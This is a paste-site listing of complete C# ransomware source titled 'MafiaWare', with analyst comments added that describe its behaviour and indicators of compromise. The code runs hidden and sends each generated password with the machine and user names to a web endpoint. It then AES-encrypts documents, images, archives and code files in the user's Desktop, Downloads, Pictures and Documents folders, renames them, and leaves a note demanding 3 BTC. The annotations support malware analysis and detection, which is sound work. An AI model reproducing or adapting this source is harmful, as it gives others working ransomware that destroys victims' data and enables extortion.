cyberking

MafiaWare Ransomware

Apr 5th, 2016
  1. /*
  2.  *
  3.  * MAFIAWARE
  4.  * Algorithm from HT, with C Sources
  5.  * Encrypt with AES256
  6.  * Coded By Cyberking
  7.  * email : cyberking@outlook.co.id
  8.  * Mafia Blackhat - Indonesian BlackHat - Indonesian Backtrack Team
  9.  * https://stillblackhat.id
  10.  *
  11.  */
  12.  
  13. using System;
  14. using System.Diagnostics;
  15. using System.Collections.Generic;
  16. using System.ComponentModel;
  17. using System.Data;
  18. using System.Drawing;
  19. using System.Linq;
  20. using System.Text;
  21. using System.Threading.Tasks;
  22. using System.Windows.Forms;
  23. using System.Security;
  24. using System.Security.Cryptography;
  25. using System.IO;
  26. using System.Net;
  27. using Microsoft.Win32;
  28. using System.Runtime.InteropServices;
  29. using System.Text.RegularExpressions;
  30. namespace mafiaware {
      // Analyst annotation (defensive reading of this sample):
      // WinForms form whose Load handler hides the window and then runs four
      // routines (ngeEnrypt .. ngeEnrypt4). Each routine generates a password,
      // sends it with the machine and user name to the URL in webPass, and
      // encrypts files with the listed extensions under one folder of the
      // current user's profile (Desktop, Downloads, Pictures, Documents).
      // Artefacts visible in this listing: the ".Locked-Mafiaware" suffix on
      // encrypted files, READ_ME.txt on the Desktop, and a GET request whose
      // "g0ttrap=" parameter carries "<machine>-<user> <password>".
      // Nothing in this listing sets up persistence or touches backups; the
      // designer half of this partial class is not shown here.
  31. public partial class Form1 : Form {
  32. // Web endpoint that receives the unlock password
      // NOTE(review): the host looks like a placeholder left by the author - not confirmed.
  33. string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap=";
      // Current user name: sent to webPass and used to build the target paths.
  34. string namaUser = Environment.UserName;
      // Machine name: sent to webPass together with the user name.
  35. string namaKompi = System.Environment.MachineName.ToString();
      // Hard-coded profile root; target paths are built as dirUsr + namaUser + folder.
  36. string dirUsr = "C:\\Users\\";
      // Constructor: only runs the designer-generated InitializeComponent().
  37. public Form1() {
  38. InitializeComponent();
  39. }
      // Load handler: makes the form invisible (zero opacity, no taskbar button)
      // and calls the four encryption routines one after another from this handler.
  40. private void Form1_Load(object sender, EventArgs e) {
  41. Opacity = 0;
  42. this.ShowInTaskbar = false;
  43. ngeEnrypt(); // encryption starts while the form is loading
  44. ngeEnrypt2();
  45. ngeEnrypt3();
  46. ngeEnrypt4();
  47. }
      // Shown handler: sets Visible to false, then sets Opacity to 100.
  48. private void Form_Shown(object sender, EventArgs e) {
  49. Visible = false;
  50. Opacity = 100;
  51. }
  52. // AES-256 encryption routine
      // Derives key and IV from passwordBytes with Rfc2898DeriveBytes (PBKDF2),
      // using a fixed 8-byte salt and 1000 iterations, then encrypts the whole
      // buffer in CBC mode and returns the ciphertext as a byte array.
      // Because the salt is constant, one password yields the same key and IV
      // for every file. The output is ciphertext only: no header, salt or
      // integrity tag is written, so an encrypted file is recognisable only by
      // the extension added in ngencryptFile.
  53. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) {
  54. byte[] encryptedBytes = null;
  55. byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
  56. using (MemoryStream ms = new MemoryStream()) {
  57. using (RijndaelManaged AES = new RijndaelManaged()) {
  58. AES.KeySize = 256;
  59. AES.BlockSize = 128;
  60. var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
      // Key and IV are consecutive reads from the same derived byte stream.
  61. AES.Key = key.GetBytes(AES.KeySize / 8);
  62. AES.IV = key.GetBytes(AES.BlockSize / 8);
  63. AES.Mode = CipherMode.CBC;
  64. using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) {
  65. cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
  66. cs.Close();
  67. }
  68. encryptedBytes = ms.ToArray();
  69. }
  70. }
  71. return encryptedBytes;
  72. }
  73. // Generates the random encryption password
      // Returns `length` characters picked from the `valid` alphabet with System.Random.
      // NOTE(review): System.Random is not a cryptographic generator; on .NET
      // Framework a parameterless instance is seeded from the system clock,
      // which matters for key-recovery analysis - confirm the target runtime.
  74. public string BuatPass(int length) {
  75. const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
  76. StringBuilder res = new StringBuilder();
  77. Random rnd = new Random();
  78. while (0 < length--){
  79. res.Append(valid[rnd.Next(valid.Length)]);
  80. }
  81. return res.ToString();
  82. }
  83.  // Sends the captured password to the web endpoint
      // Builds "<machine>-<user> <password>", appends it to webPass by plain
      // concatenation, and issues a blocking GET via WebClient.DownloadString;
      // the response body is not used.
      // Detection: a request to a path ending in "w00t.php?g0ttrap=" followed
      // by the host and user name. The URL in this listing is https, so the
      // query string is visible only on the endpoint or to a TLS-inspecting proxy.
      // There is no exception handling here, so a failed request throws to the caller.
  84. public void ngirimPass(string password){
  85. string g0ttrap = namaKompi + "-" + namaUser + " " + password;
  86. var fullUrl = webPass + g0ttrap;
  87. var conent = new System.Net.WebClient().DownloadString(fullUrl);
  88. }
  89. // Encrypts a single file
      // Reads the whole file into memory, hashes the UTF-8 password with
      // SHA-256, encrypts the content with AES_Encrypt, writes the result back
      // to the same path, and then renames the file by appending
      // ".Locked-Mafiaware" (a usable file-system indicator).
  90. public void ngencryptFile(string file, string password) {
  91. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
  92. byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
  93. // hash the password with SHA-256
  94. passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
  95. byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
  96. File.WriteAllBytes(file, bytesEncrypted);
  97. System.IO.File.Move(file, file+".Locked-Mafiaware"); // extension appended to encrypted files
  98. }
  99. // Encrypts a folder
      // Walks `location` recursively: every file whose extension is in
      // validExtensions is passed to ngencryptFile, then each subdirectory is
      // processed the same way with the same password.
  100. public void ngencryptFolder(string location, string password) {
  101. // extensions selected for encryption
  102. var validExtensions = new[] {
  103. ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar"
  104. };
  105.  
  106. string[] files = Directory.GetFiles(location);
  107. string[] childDirectories = Directory.GetDirectories(location);
  108. for (int i = 0; i < files.Length; i++){
  109. string extension = Path.GetExtension(files[i]);
  110. if (validExtensions.Contains(extension))
  111. {
  112. ngencryptFile(files[i],password);
  113. }
  114. }
  115. for (int i = 0; i < childDirectories.Length; i++){
  116. ngencryptFolder(childDirectories[i],password);
  117. }
  118. }
      // Desktop routine: generates a 15-character password, sends it with
      // ngirimPass before any file is encrypted, encrypts
      // C:\Users\<user>\Desktop, writes the ransom note, and calls Application.Exit().
      // The send comes first, so an exception from ngirimPass leaves this
      // routine before ngencryptFolder is reached.
  119. public void ngeEnrypt() {
  120. string password = BuatPass(15);
  121. string path = "\\Desktop";
  122. string startPath = dirUsr + namaUser + path;
  123. ngirimPass(password);
  124. ngencryptFolder(startPath,password);
  125. pesanReadMe();
  126. password = null;
  127. System.Windows.Forms.Application.Exit();
  128. }
      // Downloads routine: same sequence as ngeEnrypt with its own freshly
      // generated password and no ransom note, so each folder has a separate password.
  129. public void ngeEnrypt2() {
  130. string password = BuatPass(15);
  131. string path = "\\Downloads";
  132. string startPath = dirUsr + namaUser + path;
  133. ngirimPass(password);
  134. ngencryptFolder(startPath,password);
  135. password = null;
  136. System.Windows.Forms.Application.Exit();
  137. }
      // Pictures routine: same sequence as ngeEnrypt2 for C:\Users\<user>\Pictures.
  138. public void ngeEnrypt3() {
  139. string password = BuatPass(15);
  140. string path = "\\Pictures";
  141. string startPath = dirUsr + namaUser + path;
  142. ngirimPass(password);
  143. ngencryptFolder(startPath,password);
  144. password = null;
  145. System.Windows.Forms.Application.Exit();
  146. }
      // Documents routine: same sequence as ngeEnrypt2 for C:\Users\<user>\Documents.
  147. public void ngeEnrypt4() {
  148. string password = BuatPass(15);
  149. string path = "\\Documents";
  150. string startPath = dirUsr + namaUser + path;
  151. ngirimPass(password);
  152. ngencryptFolder(startPath,password);
  153. password = null;
  154. System.Windows.Forms.Application.Exit();
  155. }
      // Writes the ransom note READ_ME.txt to C:\Users\<user>\Desktop with the
      // three lines below; the file name and these strings are usable as
      // host indicators for this sample.
  156. public void pesanReadMe() {
  157. string path = "\\Desktop\\READ_ME.txt";
  158. string fullpath = dirUsr + namaUser + path;
  159. string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Send 3BTC, then Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" };
  160. System.IO.File.WriteAllLines(fullpath, lines);
  161. }
  162. }
  163. }